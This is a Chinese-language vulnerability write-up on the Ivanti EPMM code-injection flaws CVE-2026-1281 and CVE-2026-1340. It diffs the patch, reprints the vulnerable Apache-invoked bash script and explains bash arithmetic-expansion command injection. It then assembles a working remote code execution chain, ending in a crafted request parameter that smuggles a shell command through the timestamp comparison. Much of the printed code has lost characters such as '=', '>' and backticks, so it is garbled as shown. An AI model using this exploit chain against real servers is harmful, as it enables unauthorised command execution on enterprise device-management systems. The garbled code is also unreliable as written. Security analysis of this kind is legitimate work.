Ivanti EPMM RCE（CVE-2026-1340 / CVE-2026-1281）完整分析
介绍近日,Ivanti公司披露了Ivanti Endpoint Manager Mobile (EPMM)中存在的代码注入漏洞(CVE-2026-1281和CVE-2026-1340)并确认已存在在野利用。该漏洞源于 Apache HTTPd 调用的 Bash 脚本在处理时间戳比较时未能有效过滤恶意参数导致攻击者可利用 Bash 算术扩展特性注入系统命令。分析首先拿到补丁包RPM的包那就好办了直接查看它执行了什么即可使用命令rpm -qp --scripts ivanti-security-update-1761642-1.0.0L-5.noarch.rpmemmm内容有点多不过根据已知条件该漏洞源于 Apache HTTPd 补丁包里面很容易看到关键的修改Apache HTTPd配置的命令/bin/sed -i \ -e s|RewriteMap mapAppStoreURL prg:/mi/bin/map-appstore-url|RewriteMap mapAppStoreURL prg:/bin/java -cp /mi/bin AppStoreUrlMapper|g \ -e s|RewriteMap mapAftStoreURL prg:/mi/bin/map-aft-store-url|RewriteMap mapAftStoreURL prg:/bin/java -cp /mi/bin AFTUrlMapper|g \ /etc/httpd/conf.d/ssl.conf就是说把map-appstore-url和map-aft-store-url给换掉了不用是吧ok我们去看看这俩脚本是什么目录已经给了在mi/bin下我们直接进终端查一下map-appstore-url和map-aft-store-url是个bash脚本cat就可以直接看内容(另一个脚本内容差不太多就不展示了)。#!/bin/bash set -o nounset declare -x MI_DATE_COMMANDdate %Y-%m-%d--%H-%M-%S declare -x MI_DATE_FORMAT%Y-%m-%d--%H-%M-%S declare -r kScriptName$(basename $0) declare -r kScriptDirectory$(dirname $0) declare -r kLogFile/var/log/${kScriptName}.log declare -r kSaltFile/mi/files/appstore-salt.txt declare -r kScriptStartTimeSeconds$(date %s) declare -r kValidTimeStampLength${#kScriptStartTimeSeconds} declare -r kAftFileStoreDirectory/mi/files/aftstore # error codes that are used in /etc/httpd/conf.d/ssl.conf declare -r kPathTraversalAttemptedErrorCodec91bbeec40aff3fd3fe0c08044c1165a declare -r kLinkHashMismatchErrorCode44b2ff3cf69c5112061aad51e0f7d772 declare -r kTooLateErrorCodec6a0e7ca11208b4f11d04a7ee8151a46 declare -r kTooEarlyErrorCode80862895184bfa4d00b24d4fbb3d942f declare -r kKeyIndexOutOfBoundsErrorCodef74c27fce7d8e2fecd10ab54eda6bd85 declare -r kURLStructureInvalidErrorCodeb702087a848177d489a6891bd7869495 declare -r kTimestampLengthInvalidErrorCode2ecad569fdaa07e2b66ed2595cf7240f declare -r kLinkSpoofErrorCodecbfa488e9b08d4c5d7b3b2084ffb18e7 declare -r kLinkUsingOddTraversalErrorCodef489b91db387b684f56c07e7f5e4308b gShouldLogToFilefalse gSaltFileModificationTime0 
gTestModefalse gErrorCode0 gErrorMessage declare -a gSaltArray( ) gCurrentSalt gHostname gPath gStartTime gEndTime if (( $# 0 )) ; then gTestModetrue fi #echo gTestMode${gTestMode} # information function log() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } function logDebug() { if ${gTestMode} ; then echo $MI_DATE_COMMAND -- ${kScriptName} -- ${1}: ${:2} else # do not log since it kills performance ${gShouldLogToFile} echo $($MI_DATE_COMMAND) -- ${kScriptName} -- ${1}: ${:2} ${kLogFile} fi } # errorCode # information function logDenial() { local theCurrentDate$(MI_DATE_COMMAND) if ${gTestMode} ; then echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} else #echo $theCurrentDate -- ${kScriptName} -- ${1}: denying: errorCode${2}: ${:3} ${kLogFile} logger -t ${kScriptName} -i -p local0.warning $theCurrentDate -- ${1}: denying: errorCode${2}: ${:3} fi } log MAIN starting function dumpSaltArray() { log ${FUNCNAME} entered for theSalt in ${gSaltArray[]} ; do log ${FUNCNAME} theSalt$theSalt done } log MAIN after dumpSaltArray declaration function readSaltFile() { if [[ -f ${kSaltFile} ]] ; then theCurrentSaltModificationTime$(stat -c %Y ${kSaltFile}) logDebug ${FUNCNAME} theCurrentSaltModificationTime${theCurrentSaltModificationTime} theDeltaTime$(($theCurrentSaltModificationTime - $gSaltFileModificationTime)) logDebug ${FUNCNAME} theDeltaTime${theDeltaTime} if [[ ${theDeltaTime} -ne 0 ]] ; then log ${FUNCNAME} theDeltaTime${theDeltaTime} not zero; loading salt from kSaltFile${kSaltFile} gSaltArray( $(cat ${kSaltFile})) gSaltArray[0] gSaltFileModificationTime$theCurrentSaltModificationTime fi else log ${FUNCNAME} kSaltFile${kSaltFile} not found fi } log MAIN after readSaltFile declaration #readSaltFile #dumpSaltArray #readSaltFile function lookupSaltByIndex() { #echo $1 ${#gSaltArray[*]} if [ $1 
-lt ${#gSaltArray[*]} ] ; then gCurrentSalt${gSaltArray[$1]} else gCurrentSalt fi logDebug ${FUNCNAME} theKeyIndex$1; gCurrentSalt$gCurrentSalt } log MAIN after lookupSaltByIndex declaration function verifyURLConsistency () { logDebug ${FUNCNAME} ${1} local ret # this is what we eventually echo and its the name of a file for httpd to send to the client or a pattern that Rewrite is aware of and kill the connection with the right HTTP error code #theAppStoreString${1%%:*} #echo ${theAppStoreString} #declare theOldIFS${IFS} local theArgumentArray # process what httpd gave us in $1 splitting on the _ IFS_ theArgumentArray(${1}) theAftStoreString${theArgumentArray[0]} theAftStoreAssetGUIDWithExtension${theArgumentArray[1]} gHostname${theArgumentArray[2]} theURLString${theArgumentArray[3]} #echo ${theAftStoreString} # process what mifs really gave us in $1 splitting on the , IFS, theAftStoreKeyValueArray(${theAftStoreString}) IFS${theOldIFS} if (( ${#theArgumentArray[]} ! 4 )) ; then ret${kURLStructureInvalidErrorCode} log ${FUNCNAME} ${ret} expecting 5 segments; actual${#theArgumentArray[]} fi if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*} logDebug ${FUNCNAME} theKey$theKey; theValue$theValue case ${theKey} in kid) gKeyIndex${theValue} ;; st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; et) gEndTime${theValue} if (( ${#gEndTime} ! 
${kValidTimeStampLength} )) ; then ret${kTimestampLengthInvalidErrorCode} fi ;; h) gHashPrefixString${theValue} ;; *) ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} unknown presented key${theKey}; theValue${theValue} ;; esac done fi if [[ -z ${ret} ]] ; then lookupSaltByIndex ${gKeyIndex} if [[ -n ${gCurrentSalt} ]] ; then logDebug ${FUNCNAME} continuing: gCurrentSalt$gCurrentSalt theCurrentTimeSeconds$(date %s) logDebug ${FUNCNAME} theCurrentTimeSeconds${theCurrentTimeSeconds} #theCurrentTimeSeconds1336011206 #theCurrentTimeSeconds1336770818 #gHostnamecot-0000001.mobileiron.com #gHostnameqa42.mobileiron.com if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]] ; then logDebug ${FUNCNAME} continuing: not too early if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; then logDebug ${FUNCNAME} continuing: not too late # calculate the path gPath${theURLString/\/sha256:${theAftStoreString}/} theStringToHash${gCurrentSalt}${gHostname}${gPath}${gStartTime}${gEndTime} theAssetFile${theAftStoreAssetGUIDWithExtension} # the string to hash must end with the assetfile start end logDebug ${FUNCNAME} theStringToHash${theStringToHash} if [[ ${theStringToHash} *${theAssetFile}${gStartTime}${gEndTime} ]] ; then theSHA256Hash$(echo -n ${theStringToHash} | sha256sum) theSHA256Prefix${theSHA256Hash:0:64} # theSHA256Prefix${theSHA256Hash} logDebug ${FUNCNAME} theSHA256Hash$theSHA256Hash; theSHA256Prefix$theSHA256Prefix shopt -s nocasematch if [[ ${theSHA256Prefix} ${gHashPrefixString} ]] ; then logDebug ${FUNCNAME} hash matched if [[ ${theAssetFile} *..* ]] || [[ ${theAssetFile} .* ]] || [[ ${theAssetFile} /* ]]; then ret${kPathTraversalAttemptedErrorCode} logDenial ${FUNCNAME} ${ret} getting spoofed: ${theAssetFile} else ret${kAftFileStoreDirectory}/${theAftStoreAssetGUIDWithExtension} fi else ret${kLinkHashMismatchErrorCode} logDenial ${FUNCNAME} ${ret} link hash mismatch: theSHA256Prefix$theSHA256Prefix; gHashPrefixString${gHashPrefixString}; ${1} fi else 
ret${kLinkSpoofErrorCode} logDenial ${FUNCNAME} ${ret} link being spoofed: theStringToHash${theStringToHash}; requiredSuffix${theAppStoreSubDirectory}/${theAppStoreAssetGUID}${theAppStoreAssetExtension}${gStartTime}${gEndTime}; ${1} fi shopt -u nocasematch else ret${kTooLateErrorCode} logDenial ${FUNCNAME} ${ret} link too late: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kTooEarlyErrorCode} logDenial ${FUNCNAME} ${ret} link too early: theCurrentTimeSeconds${theCurrentTimeSeconds}; ${1} fi else ret${kKeyIndexOutOfBoundsErrorCode} logDenial ${FUNCNAME} ${ret} key index out of bounds: ${1} fi else ret${kURLStructureInvalidErrorCode} logDenial ${FUNCNAME} ${ret} URL not structurally correct: ${1} fi # tell httpd what file to send (or error message) echo ${ret} } if ${gTestMode} ; then readSaltFile verifyURLConsistency ${1} else logDebug MAIN looping readSaltFile while read theCurrentLine; do readSaltFile logDebug MAIN ${theCurrentLine} verifyURLConsistency ${theCurrentLine} done fi但内容太多了我们还是请AI老师帮我们统一分析一下AI老师帮我们分析并得到了一个传参请求然后我们还得去apache的配置文件看看入口路径是什么在/etc/httpd/conf.d/ssl.conf文件中找找相关的内容,由于配置文件内容太多了这里就不贴了我也懒得找还是让AI老师帮我们找找吧。deepseek老师还是太善解人意了直接给了一个标准请求/mifs/c/appstore/fob/3/1120/sha256:kid1,st1666663066,et1666670266,ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2/75dc90fe-6ae7-4377-913b-7248334d39dc.ipa但这些传参到bash中并没有找到明显的直接命令执行的点这时我们需要再理解一下bash脚本首先看bash脚本中的开头gKeyIndex gStartTime gEndTime gHashPrefixString gPath IFS, read -ra theAppStoreKeyValueArray脚本会用IFS,把传入的参数分割成数组theAppStoreKeyValueArray传参后是这样的数组[kid1, st1444444444, et1444444444, ha1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2]然后在下方有这样的一段循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}它把传参的这些参数名和值循环赋值给了theKey和theValue然后又被赋值到全局变量gKeyIndex、gStartTime、gEndTime、gHashPrefixString中继续跟下去看看这些值在哪里用到。key参数赋值到了变量gKeyIndex最终在这里应用kAppStoreSaltFile/mi/files/appstore-salt.txt gSalt if 
[[ -f ${kAppStoreSaltFile} ]]; then gSalt$(sed -n ${gKeyIndex}p ${kAppStoreSaltFile}) if [[ -z ${gSalt} ]]; then ret${kSaltIndexInvalidErrorCode} logDenial ${FUNCNAME} ${ret} kid(${gKeyIndex}) is invalid (no salt found) fi else ret${kSaltFileMissingErrorCode} logDenial ${FUNCNAME} ${ret} Salt file ${kAppStoreSaltFile} not found fi它是用来读取/mi/files/appstore-salt.txt对应行的这个文件里面的hash值读取出来用来校验后续参数。st 参数最终赋值给了gStartTime分别在两个地方被调用kValidTimeStampLength10 case ${theKey} in st) gStartTime${theValue} if (( ${#gStartTime} ! ${kValidTimeStampLength} )); then ret${kTimestampLengthInvalidErrorCode} fi ;;这里判断了这个参数是否长度为10。theCurrentTimeSeconds$(date %s) if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then logDebug ${FUNCNAME} Current time(${theCurrentTimeSeconds}) start time(${gStartTime}) # ... else ret${kRequestExpiredErrorCode} logDenial ${FUNCNAME} ${ret} Start time(${gStartTime}) is in the future fi这里用来比较当前时间是否晚于请求开始时间。et 参数gEndTime和gStartTime的用处差不多也校验了长度和用于验证当前时间≤结束时间。h 参数gHashPrefixString是用于hash校验的值。看上去还是没有直观的命令执行的代码别急我们再引入一个知识点。首先给大家看一个脚本#!/bin/bash arr vararr[echo hacked ./hack_mht0] [[ 1 -gt $var ]] if [[ -f ./hack_mht ]]; then echo 执行成功 else echo 未执行 fibro们觉得这个脚本能成功执行命令吗答案为什么会这样捏因为在bash中数值比较功能可以解析array[index]这样的数值索引index会被优先解析为算数表达式比如array[11]会先计算11而bash又有一个命令替换的优先级规则如果你把array[11]改为array[echo 111]则先执行被反引号包裹的命令举例current_datedate echo 今天是: $current_date echo 当前目录: pwd显然在if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; 和if [[ ${theCurrentTimeSeconds} -lt ${gEndTime} ]] ; 中都存在这个条件但我们之前说了gStartTime和gEndTime都做了长度校验的必须为十位这就很鸡肋了那怎么样才能绕过这个问题呢回到最开始的定义变量与循环if [[ -z ${ret} ]] ; then for theKeyMapEntry in ${theAftStoreKeyValueArray[]} ; do theKey${theKeyMapEntry%%*} theValue${theKeyMapEntry##*}bash中使用theKey和theValue循环赋值传参的最后一个值为h所以theValue最后的值是就是h的值那现在就很有意思了gStartTime和gEndTime都有长度限制但h的值没有能不能让h的值走到if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then里面去应用数值索引命令替换呢可以的既然在bash中有变量theValueh传参那我们就直接让gStartTimetheValue最终流程可控h参数-theValue-gStartTime然后进入if [[ 
${theCurrentTimeSeconds} -gt ${gStartTime} ]];应用数值索引命令替换现在我们已经有了RCE的完整链条开始构造最终poc。kid参数为文件行数随便用个1st参数为theValue注意十位长度校验所以还需要再加两个空格et参数也参与比较也可作为theValue传参st与et随便一个地方设置为theValue都可以最后是h参数只需要满足array[index]即可。index部分的内容有了array部分写什么呢bash开头开启了set -o nounset这是严格模式严格模式下Bash 遇到未定义的变量会直接终止脚本执行直接从bash开头定义的那些空变量里面选一个比如gPath和gHostname都可以构造最终值gHostname[id /mi/bin/mht]